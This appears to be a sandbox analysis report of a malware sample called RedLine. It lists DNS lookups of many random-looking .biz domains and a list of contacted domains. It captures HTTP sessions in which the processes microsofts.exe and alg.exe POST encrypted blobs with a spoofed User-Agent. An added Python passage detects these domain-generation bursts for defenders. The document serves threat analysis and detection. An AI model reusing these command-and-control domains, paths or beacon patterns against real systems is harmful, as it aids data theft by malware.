                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:35.777198076 CET1.1.1.1192.168.2.50xdb5fNo error (0)myups.biz165.160.15.20A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:35.777198076 CET1.1.1.1192.168.2.50xdb5fNo error (0)myups.biz165.160.13.20A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:36.539670944 CET1.1.1.1192.168.2.50xe55fNo error (0)saytjshyf.biz44.221.84.105A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:37.241432905 CET1.1.1.1192.168.2.50x1b73No error (0)vcddkls.biz18.141.10.107A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:37.493063927 CET1.1.1.1192.168.2.50xbb5dNo error (0)oshhkdluh.biz54.244.188.177A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:38.654068947 CET1.1.1.1192.168.2.50x37f2No error (0)yunalwv.biz208.100.26.245A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:38.725347996 CET1.1.1.1192.168.2.50xbd18No error (0)fwiwk.biz172.234.222.143A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:38.725347996 CET1.1.1.1192.168.2.50xbd18No error (0)fwiwk.biz172.234.222.138A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:39.673041105 CET1.1.1.1192.168.2.50xcb0aNo error (0)jpskm.biz34.211.97.45A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:40.325823069 CET1.1.1.1192.168.2.50xe2afNo error (0)tbjrpv.biz34.246.200.160A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:41.099208117 CET1.1.1.1192.168.2.50x7faNo error (0)lrxdmhrr.biz54.244.188.177A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:41.459862947 CET1.1.1.1192.168.2.50xff65No error (0)deoci.biz18.208.156.248A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:42.061830997 CET1.1.1.1192.168.2.50x5d5fNo error (0)wllvnzb.biz18.141.10.107A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:42.171696901 CET1.1.1.1192.168.2.50xaf38No error (0)gytujflc.biz208.100.26.245A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:43.062865019 CET1.1.1.1192.168.2.50x79c7No error (0)qaynky.biz13.251.16.150A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:44.031534910 CET1.1.1.1192.168.2.50x30e9No error (0)gnqgo.biz18.208.156.248A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:44.541054010 CET1.1.1.1192.168.2.50xa6ddNo error (0)bumxkqgxu.biz44.221.84.105A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:44.906058073 CET1.1.1.1192.168.2.50x240fNo error (0)jhvzpcfg.biz44.221.84.105A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:45.242202044 CET1.1.1.1192.168.2.50xa075No error (0)dwrqljrr.biz54.244.188.177A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:45.800015926 CET1.1.1.1192.168.2.50x7d01No error (0)acwjcqqv.biz18.141.10.107A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:46.127516985 CET1.1.1.1192.168.2.50x66a6No error (0)nqwjmb.biz35.164.78.200A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:46.998137951 CET1.1.1.1192.168.2.50xa945No error (0)ytctnunms.biz3.94.10.34A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:47.505578041 CET1.1.1.1192.168.2.50xcbfdNo error (0)vyome.biz18.246.231.120A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:47.725745916 CET1.1.1.1192.168.2.50xe397No error (0)myups.biz165.160.13.20A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:47.725745916 CET1.1.1.1192.168.2.50xe397No error (0)myups.biz165.160.15.20A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:48.595817089 CET1.1.1.1192.168.2.50xad45No error (0)yauexmxk.biz18.208.156.248A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:49.487639904 CET1.1.1.1192.168.2.50x94a9No error (0)oshhkdluh.biz54.244.188.177A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:49.625319004 CET1.1.1.1192.168.2.50x19No error (0)iuzpxe.biz13.251.16.150A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:50.481975079 CET1.1.1.1192.168.2.50xd28No error (0)yunalwv.biz208.100.26.245A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:51.561342955 CET1.1.1.1192.168.2.50xb9d0No error (0)sxmiywsfv.biz13.251.16.150A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:35.942819118 CET1.1.1.1192.168.2.50x9d2bNo error (0)reczwga.biz44.221.84.105A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:36.198168993 CET1.1.1.1192.168.2.50x5cb0No error (0)bghjpy.biz34.211.97.45A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:37.323556900 CET1.1.1.1192.168.2.50xca55No error (0)damcprvgv.biz18.208.156.248A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:37.409291029 CET1.1.1.1192.168.2.50x251dNo error (0)bghjpy.biz34.211.97.45A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:38.072287083 CET1.1.1.1192.168.2.50x50f2No error (0)ocsvqjg.biz3.254.94.185A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:38.568357944 CET1.1.1.1192.168.2.50x9cf0No error (0)damcprvgv.biz18.208.156.248A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:39.084431887 CET1.1.1.1192.168.2.50xa6b8No error (0)ywffr.biz54.244.188.177A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:40.132273912 CET1.1.1.1192.168.2.50x3b44No error (0)ocsvqjg.biz3.254.94.185A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:40.134387016 CET1.1.1.1192.168.2.50xae00No error (0)ecxbwt.biz54.244.188.177A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:41.004966974 CET1.1.1.1192.168.2.50x1f08No error (0)pectx.biz18.246.231.120A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:41.405803919 CET1.1.1.1192.168.2.50x2d56No error (0)ywffr.biz54.244.188.177A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:41.965666056 CET1.1.1.1192.168.2.50x5c20No error (0)zyiexezl.biz18.208.156.248A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:42.746830940 CET1.1.1.1192.168.2.50xc4afNo error (0)ecxbwt.biz54.244.188.177A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:42.746833086 CET1.1.1.1192.168.2.50xc4afNo error (0)ecxbwt.biz54.244.188.177A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:43.237704992 CET1.1.1.1192.168.2.50x25c9No error (0)banwyw.biz44.221.84.105A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:43.928983927 CET1.1.1.1192.168.2.50xe174No error (0)wxgzshna.biz72.52.178.23A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:43.954538107 CET1.1.1.1192.168.2.50x4c71No error (0)pectx.biz18.246.231.120A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:45.279520035 CET1.1.1.1192.168.2.50x82d6No error (0)zyiexezl.biz18.208.156.248A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:45.437299013 CET1.1.1.1192.168.2.50x905bNo error (0)zrlssa.biz44.221.84.105A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:46.123095036 CET1.1.1.1192.168.2.50x9a05No error (0)jlqltsjvh.biz18.141.10.107A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:46.150751114 CET1.1.1.1192.168.2.50xf25dNo error (0)banwyw.biz44.221.84.105A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:47.241660118 CET1.1.1.1192.168.2.50x8776No error (0)wxgzshna.biz72.52.178.23A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:47.577964067 CET1.1.1.1192.168.2.50x4c62No error (0)xyrgy.biz18.208.156.248A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:48.317573071 CET1.1.1.1192.168.2.50xe021No error (0)htwqzczce.biz172.234.222.138A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:48.317573071 CET1.1.1.1192.168.2.50xe021No error (0)htwqzczce.biz172.234.222.143A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:49.429039955 CET1.1.1.1192.168.2.50x7045No error (0)zrlssa.biz44.221.84.105A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:49.777406931 CET1.1.1.1192.168.2.50x6544No error (0)kvbjaur.biz54.244.188.177A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:50.462629080 CET1.1.1.1192.168.2.50x647cNo error (0)jlqltsjvh.biz18.141.10.107A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:50.631509066 CET1.1.1.1192.168.2.50x2a6aNo error (0)uphca.biz44.221.84.105A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:51.315350056 CET1.1.1.1192.168.2.50x2200No error (0)fjumtfnz.biz34.211.97.45A (IP address)IN (0x0001)false
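The resolutions above are what the "Queries random domain names" signature is keyed on: dozens of distinct, meaningless second-level labels under a single TLD (.biz), each queried once or twice within a few seconds of the others, with several unrelated names resolving to the same handful of addresses. The following is an added example, not part of the Joe Sandbox report and not code from the RedLine sample, that parses rows in the pipe-separated layout used above and applies the checks a detection engineer would run over DNS logs: a per-name randomness heuristic, an aggregate burst check (many new names under one TLD in a short window), and a map of answer addresses shared by unrelated names. The .biz rows are copied from the table; the updates.example.net row is a constructed benign control and its address (192.0.2.10) is from the documentation range, not a real host.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample in the pipe-separated layout of the DNS answers table above.
# The .biz rows are copied from that table; the updates.example.net row is a
# made-up benign control (192.0.2.10 is a documentation address, not a real host).
SAMPLE_DNS_ANSWERS = """\
Nov 5, 2024 17:04:30.426217079 CET | 1.1.1.1 | 192.168.2.5 | 0x7ac4 | No error (0) | ctdtgwag.biz | 3.94.10.34 | A (IP address) | IN (0x0001) | false
Nov 5, 2024 17:04:31.132795095 CET | 1.1.1.1 | 192.168.2.5 | 0xaf1 | No error (0) | tnevuluw.biz | 35.164.78.200 | A (IP address) | IN (0x0001) | false
Nov 5, 2024 17:04:32.571757078 CET | 1.1.1.1 | 192.168.2.5 | 0x8fe2 | No error (0) | whjovd.biz | 18.141.10.107 | A (IP address) | IN (0x0001) | false
Nov 5, 2024 17:04:33.100000000 CET | 1.1.1.1 | 192.168.2.5 | 0x0001 | No error (0) | updates.example.net | 192.0.2.10 | A (IP address) | IN (0x0001) | false
Nov 5, 2024 17:04:34.064445972 CET | 1.1.1.1 | 192.168.2.5 | 0x6085 | No error (0) | gjogvvpsf.biz | 208.100.26.245 | A (IP address) | IN (0x0001) | false
Nov 5, 2024 17:04:35.486751080 CET | 1.1.1.1 | 192.168.2.5 | 0xe81 | No error (0) | reczwga.biz | 44.221.84.105 | A (IP address) | IN (0x0001) | false
Nov 5, 2024 17:04:36.198168993 CET | 1.1.1.1 | 192.168.2.5 | 0x5cb0 | No error (0) | bghjpy.biz | 34.211.97.45 | A (IP address) | IN (0x0001) | false
Nov 5, 2024 17:04:37.323556900 CET | 1.1.1.1 | 192.168.2.5 | 0xca55 | No error (0) | damcprvgv.biz | 18.208.156.248 | A (IP address) | IN (0x0001) | false
Nov 5, 2024 17:04:38.072287083 CET | 1.1.1.1 | 192.168.2.5 | 0x50f2 | No error (0) | ocsvqjg.biz | 3.254.94.185 | A (IP address) | IN (0x0001) | false
Nov 5, 2024 17:04:39.084431887 CET | 1.1.1.1 | 192.168.2.5 | 0xa6b8 | No error (0) | ywffr.biz | 54.244.188.177 | A (IP address) | IN (0x0001) | false
Nov 5, 2024 17:04:40.134387016 CET | 1.1.1.1 | 192.168.2.5 | 0xae00 | No error (0) | ecxbwt.biz | 54.244.188.177 | A (IP address) | IN (0x0001) | false
Nov 5, 2024 17:04:41.004966974 CET | 1.1.1.1 | 192.168.2.5 | 0x1f08 | No error (0) | pectx.biz | 18.246.231.120 | A (IP address) | IN (0x0001) | false
Nov 5, 2024 17:04:41.965666056 CET | 1.1.1.1 | 192.168.2.5 | 0x5c20 | No error (0) | zyiexezl.biz | 18.208.156.248 | A (IP address) | IN (0x0001) | false
Nov 5, 2024 17:04:43.237704992 CET | 1.1.1.1 | 192.168.2.5 | 0x25c9 | No error (0) | banwyw.biz | 44.221.84.105 | A (IP address) | IN (0x0001) | false
Nov 5, 2024 17:04:45.437299013 CET | 1.1.1.1 | 192.168.2.5 | 0x905b | No error (0) | zrlssa.biz | 44.221.84.105 | A (IP address) | IN (0x0001) | false
"""

VOWELS = set("aeiou")


def parse_answers(text):
    """Parse pipe-separated answer rows into dicts; malformed lines are skipped."""
    records = []
    for line in text.strip().splitlines():
        cols = [c.strip() for c in line.split("|")]
        if len(cols) != 10:
            continue
        # strptime accepts at most six fractional-second digits; the table has nine.
        ts = re.sub(r"(\.\d{6})\d+", r"\1", cols[0])
        records.append({
            "ts": datetime.strptime(ts, "%b %d, %Y %H:%M:%S.%f CET"),
            "txid": cols[3], "rcode": cols[4], "name": cols[5].lower(),
            "data": cols[6], "type": cols[7],
        })
    return records


def registered_label(name):
    """Label directly under the TLD. A production check would consult the
    public-suffix list so that 'foo.co.uk' yields 'foo' rather than 'co'."""
    labels = name.rstrip(".").split(".")
    return labels[-2] if len(labels) >= 2 else labels[0]


def looks_random(name):
    """Cheap per-name heuristic: few vowels or a long consonant run in the
    registered label. Deliberately simple; it misses some of the names above
    (e.g. tnevuluw.biz), which is why the aggregate check below exists."""
    label = registered_label(name)
    if len(label) < 5:
        return False
    vowel_ratio = sum(c in VOWELS for c in label) / len(label)
    runs = re.findall(r"[^aeiou]+", label)
    longest_consonant_run = max((len(r) for r in runs), default=0)
    return vowel_ratio < 0.3 or longest_consonant_run >= 4


def dga_bursts(records, window=timedelta(seconds=60), min_distinct=10):
    """Return {tld: [names]} for TLDs under which at least min_distinct distinct
    names were first resolved (NOERROR, A record) within one sliding window."""
    first_seen = {}
    for r in records:
        if r["type"].startswith("A") and r["rcode"].startswith("No error"):
            first_seen[r["name"]] = min(r["ts"], first_seen.get(r["name"], r["ts"]))
    by_tld = defaultdict(list)
    for name, ts in first_seen.items():
        by_tld[name.rsplit(".", 1)[-1]].append((ts, name))
    bursts = {}
    for tld, events in by_tld.items():
        events.sort()
        start = 0
        for end in range(len(events)):
            while events[end][0] - events[start][0] > window:
                start += 1
            if end - start + 1 >= min_distinct:
                # Overwritten on each hit, so the result is the last qualifying window.
                bursts[tld] = sorted(n for _, n in events[start:end + 1])
    return bursts


def shared_answer_ips(records, min_names=2):
    """Map each A-record address to the distinct names it answered for, keeping
    only addresses reused by several names (a sinkhole/parking fingerprint)."""
    names_by_ip = defaultdict(set)
    for r in records:
        if r["type"].startswith("A"):
            names_by_ip[r["data"]].add(r["name"])
    return {ip: sorted(n) for ip, n in names_by_ip.items() if len(n) >= min_names}


if __name__ == "__main__":
    recs = parse_answers(SAMPLE_DNS_ANSWERS)
    print("random-looking:", sorted({r["name"] for r in recs if looks_random(r["name"])}))
    print("bursts:", dga_bursts(recs))
    print("shared answers:", shared_answer_ips(recs))
```

Run against the sample, the per-name heuristic flags most of the .biz labels but not all of them, while the burst check flags every .biz name at once and leaves the control name alone; the shared-address map surfaces 44.221.84.105, 18.208.156.248 and 54.244.188.177 as addresses answering for several unrelated names. The thresholds (60 s, 10 names) are assumptions for this demo; tune them against your own resolver logs, and keep the aggregate check as the alerting signal, since per-name scoring alone produces both misses and false positives on legitimate short brand names.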
• api.ipify.org
• pywolwnvd.biz
• ssbzmoy.biz
• cvgrf.biz
• npukfztj.biz
• przvgke.biz
• knjghuig.biz
• lpuegx.biz
• vjaxhpbji.biz
• xlfhhhm.biz
• ifsaia.biz
• saytjshyf.biz
• vcddkls.biz
• fwiwk.biz
• tbjrpv.biz
• deoci.biz
• gytujflc.biz
• qaynky.biz
• bumxkqgxu.biz
• dwrqljrr.biz
• nqwjmb.biz
• ytctnunms.biz
• myups.biz
• oshhkdluh.biz
• yunalwv.biz
• jpskm.biz
• lrxdmhrr.biz
• wllvnzb.biz
• gnqgo.biz
• jhvzpcfg.biz
• acwjcqqv.biz
• vyome.biz
• yauexmxk.biz
• iuzpxe.biz
• sxmiywsfv.biz
• vrrazpdh.biz
• ftxlah.biz
• typgfhb.biz
• esuzf.biz
• gvijgjwkh.biz
                                                                                                                                                                                                                                                                                                                                                                                                              • qpnczch.biz
                                                                                                                                                                                                                                                                                                                                                                                                              • brsua.biz
                                                                                                                                                                                                                                                                                                                                                                                                              • dlynankz.biz
                                                                                                                                                                                                                                                                                                                                                                                                              • oflybfv.biz
                                                                                                                                                                                                                                                                                                                                                                                                              • yhqqc.biz
                                                                                                                                                                                                                                                                                                                                                                                                              • mnjmhp.biz
                                                                                                                                                                                                                                                                                                                                                                                                              • opowhhece.biz
                                                                                                                                                                                                                                                                                                                                                                                                              • jdhhbs.biz
                                                                                                                                                                                                                                                                                                                                                                                                              • mgmsclkyu.biz
                                                                                                                                                                                                                                                                                                                                                                                                              • warkcdu.biz
                                                                                                                                                                                                                                                                                                                                                                                                              • gcedd.biz
                                                                                                                                                                                                                                                                                                                                                                                                              • jwkoeoqns.biz
                                                                                                                                                                                                                                                                                                                                                                                                              • xccjj.biz
                                                                                                                                                                                                                                                                                                                                                                                                              • hehckyov.biz
                                                                                                                                                                                                                                                                                                                                                                                                              • rynmcq.biz
                                                                                                                                                                                                                                                                                                                                                                                                              • uaafd.biz
                                                                                                                                                                                                                                                                                                                                                                                                              • eufxebus.biz
                                                                                                                                                                                                                                                                                                                                                                                                              • pwlqfu.biz
                                                                                                                                                                                                                                                                                                                                                                                                              • rrqafepng.biz
                                                                                                                                                                                                                                                                                                                                                                                                              • ctdtgwag.biz
                                                                                                                                                                                                                                                                                                                                                                                                              • tnevuluw.biz
                                                                                                                                                                                                                                                                                                                                                                                                              • whjovd.biz
                                                                                                                                                                                                                                                                                                                                                                                                              • gjogvvpsf.biz
                                                                                                                                                                                                                                                                                                                                                                                                              • reczwga.biz
                                                                                                                                                                                                                                                                                                                                                                                                              • bghjpy.biz
                                                                                                                                                                                                                                                                                                                                                                                                              • damcprvgv.biz
                                                                                                                                                                                                                                                                                                                                                                                                              • ocsvqjg.biz
                                                                                                                                                                                                                                                                                                                                                                                                              • ywffr.biz
                                                                                                                                                                                                                                                                                                                                                                                                              • ecxbwt.biz
                                                                                                                                                                                                                                                                                                                                                                                                              • pectx.biz
                                                                                                                                                                                                                                                                                                                                                                                                              • zyiexezl.biz
                                                                                                                                                                                                                                                                                                                                                                                                              • banwyw.biz
                                                                                                                                                                                                                                                                                                                                                                                                              • wxgzshna.biz
                                                                                                                                                                                                                                                                                                                                                                                                              • zrlssa.biz
                                                                                                                                                                                                                                                                                                                                                                                                              • jlqltsjvh.biz
                                                                                                                                                                                                                                                                                                                                                                                                              • xyrgy.biz
                                                                                                                                                                                                                                                                                                                                                                                                              • htwqzczce.biz
                                                                                                                                                                                                                                                                                                                                                                                                              • kvbjaur.biz
                                                                                                                                                                                                                                                                                                                                                                                                              • uphca.biz
Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
0           192.168.2.5  49705        54.244.188.177  80                1816  C:\Users\user\AppData\Local\Temp\microsofts.exe

Timestamp: Nov 5, 2024 17:02:51.136552095 CET   Bytes transferred: 352   Direction: OUT
POST /bimwjsl HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: pywolwnvd.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 828

Timestamp: Nov 5, 2024 17:02:51.136552095 CET   Bytes transferred: 828   Direction: OUT
Data Raw: 96 a0 73 96 08 0f 16 18 30 03 00 00 7e a6 e2 cf ec d9 b7 cf 63 69 a9 50 48 c1 66 1c d0 f5 73 fb 17 b7 4a 25 73 07 81 af 6a 91 5f e9 fb 52 42 bd 5e da 42 d3 d5 6a f3 e5 89 30 fe bb 7b 03 29 c4 fd ed 21 80 4e af 3d 0b c7 42 78 87 c0 af d8 14 9e b0
Data Ascii: s0~ciPHfsJ%sj_RB^Bj0{)!N=Bxz5=T'M,%zr-"]`0>7#HhLKEKD*?e".J{m~M!}:*~VcMIQ8dh,cHZb

Timestamp: Nov 5, 2024 17:02:51.982191086 CET   Bytes transferred: 417   Direction: IN
HTTP/1.1 200 OK
Server: nginx
Date: Tue, 05 Nov 2024 16:02:51 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: btst=f0045f4288f477dccbc97104a277528a|173.254.250.76|1730822571|1730822571|0|1|0; path=/; domain=.pywolwnvd.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
Set-Cookie: snkz=173.254.250.76; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
1           192.168.2.5  49706        18.141.10.107   80                1816  C:\Users\user\AppData\Local\Temp\microsofts.exe

Timestamp: Nov 5, 2024 17:02:52.034046888 CET   Bytes transferred: 347   Direction: OUT
POST /hmdy HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: ssbzmoy.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 828

Timestamp: Nov 5, 2024 17:02:52.034073114 CET   Bytes transferred: 828   Direction: OUT
Data Raw: 24 e8 de 29 f4 01 3f 49 30 03 00 00 5b 0a d8 47 05 2b 07 2f cf ff 5a 36 4e 78 a8 7e 03 ba b3 64 71 87 a2 40 d4 06 ff b6 2a 90 f2 63 8e c9 5e 5b dd bd 91 f8 58 59 40 98 4a 7d 5b 58 06 53 07 2f 48 2d 01 a5 ab fc 02 90 7b 97 f1 aa 47 05 5d 91 20 aa
Data Ascii: $)?I0[G+/Z6Nx~dq@*c^[XY@J}[XS/H-{G] :''?}oO(tmeI<aFNZpn,O[k$,[ew.c}<[vA}?@rzS(@iAxMdt!sW`0y2DT!F!6oG}V6

Timestamp: Nov 5, 2024 17:02:53.504396915 CET   Bytes transferred: 415   Direction: IN
HTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                              Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                                              Date: Tue, 05 Nov 2024 16:02:53 GMT
                                                                                                                                                                                                                                                                                                                                                                                                              Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                              Set-Cookie: btst=ee7c52bd1d7a84457394048b6915c870|173.254.250.76|1730822573|1730822573|0|1|0; path=/; domain=.ssbzmoy.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                                              Set-Cookie: snkz=173.254.250.76; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                              Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: 0


Session ID: 2
Source IP: 192.168.2.5
Source Port: 49707
Destination IP: 54.244.188.177
Destination Port: 80
PID: 1492
Process: C:\Windows\System32\alg.exe

Timestamp | Bytes transferred | Direction | Data
Nov 5, 2024 17:02:52.050487995 CET | 346 | OUT | POST /p HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: pywolwnvd.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 778
Nov 5, 2024 17:02:52.050487995 CET | 778 | OUT | Data Raw: bf 58 a1 3e ec 80 59 c2 fe 02 00 00 6a 60 4b 75 71 03 3a e6 36 41 7c 37 d1 a6 e6 38 9c 4d 52 43 2a ab 4f 6d 35 61 7a 00 54 f6 68 02 ce af 8c fb 4c 6c a5 a1 f5 b2 5d 9a 01 c6 4b 00 7e 29 0a 14 ee cf 7e 1e f4 bb 70 d8 fd c4 ce 88 a9 14 fd f1 26 fb
Data Ascii: X>Yj`Kuq:6A|78MRC*Om5azThLl]K~)~p&~-#Kx"*%MF4lF(`8sov]mDlFcB$~W^+ Fk"*}'^gHf#\/FKqYPlo&GPb
Nov 5, 2024 17:02:52.881268024 CET | 417 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Tue, 05 Nov 2024 16:02:52 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: btst=ac3023501502456f227a9c400e6181d2|173.254.250.76|1730822572|1730822572|0|1|0; path=/; domain=.pywolwnvd.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
Set-Cookie: snkz=173.254.250.76; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID: 3
Source IP: 192.168.2.5
Source Port: 49709
Destination IP: 18.141.10.107
Destination Port: 80
PID: 1492
Process: C:\Windows\System32\alg.exe

Timestamp | Bytes transferred | Direction | Data
Nov 5, 2024 17:02:53.067039013 CET | 350 | OUT | POST /vrnakrk HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: ssbzmoy.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 778
